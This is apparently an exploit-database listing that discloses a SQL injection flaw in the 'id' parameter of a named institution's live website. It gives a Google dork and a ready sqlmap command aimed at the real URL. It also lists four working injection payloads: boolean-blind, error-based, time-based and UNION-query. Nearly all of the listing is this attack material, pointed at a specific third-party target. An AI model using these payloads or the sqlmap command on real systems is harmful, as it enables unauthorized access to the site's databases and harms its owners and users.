KYANC - SQL Injection vulnerability

2020.09.13
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

**************************** #Exploit Title: KYANC - SQL Injection vulnerability #Date: 2020-09-12 #Exploit Author: Mahdi Karimi #Vendor Homepage: http://kyanc.edu.bd #Google Dork: page.php?id=10 #Tested On: windows 10 sqlmap: sqlmap -u "http://kyanc.edu.bd/page.php?id=10" --dbs Testing Method; - error-based - boolean-based blind - UNION query - AND/OR time-based blind Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=10' AND 2976=2976 AND 'xUaU'='xUaU Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=10' AND (SELECT 9018 FROM(SELECT COUNT(*),CONCAT(0x7162627171,(SELECT (ELT(9018=9018,1))),0x716a7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'YGjR'='YGjR Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=10' AND SLEEP(5) AND 'FAFs'='FAFs Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: id=10' UNION ALL SELECT NULL,CONCAT(0x7162627171,0x52545a55717271456c42707067434f4b6254434f6e5953494f7a4a535465534a70505a4f676e6571,0x716a7a7671),NULL,NULL,NULL,NULL-- Oiqi ************************************************** #Discovered by: Mahdi Karimi #Email : mjoker22mjoker22@gmail.com **************************************************


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top